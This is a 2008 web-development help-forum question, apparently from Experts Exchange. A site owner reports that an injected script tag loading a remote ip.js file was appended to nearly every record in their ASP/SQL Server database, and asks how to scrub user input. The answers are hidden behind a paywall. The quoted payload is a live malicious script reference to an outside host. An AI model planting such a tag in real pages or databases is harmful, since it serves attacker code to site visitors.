Advertisement

05.11.2008 at 11:16PM PDT, ID: 23393752
[x]
Attachment Details

How to scrub user input to prevent malicous scripts being uploaded to a sql dbase via asp.

Asked by joerinnis in Active Server Pages (ASP), Miscellaneous Web Development, dBase

Tags: , ,

I'm running a website using asp/SQL Server.  I just discovered that the following script <script src=http://www.r<script src=http://www.ririwow.cn/ip.js></script> was appeneded to every record in just about every table in my SQL database.  Someone on this site had suggested to another member that they scrub user input to prevent this from happening in the future.  Can someone give me an example of how to scrub for something like the above?  Thanks for the help.Start Free Trial
 
Loading Advertisement...
 
[+][-]05.11.2008 at 11:29PM PDT, ID: 21544935

View this solution now by starting your 7-day free trial. Setting up your free trial is quick, easy, and secure. We will return you to this solution, unlocked, when you're done.

 

About this solution

Zones: Active Server Pages (ASP), Miscellaneous Web Development, dBase
Tags: asp, IE, www.fpitasca.org
Sign Up Now!
Solution Provided By: ALNMOO
Participating Experts: 2
Solution Grade: A
 
 
[+][-]05.12.2008 at 02:33AM PDT, ID: 21545513

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
 
Loading Advertisement...
20080716-EE-VQP-32 / EE_QW_2_20070628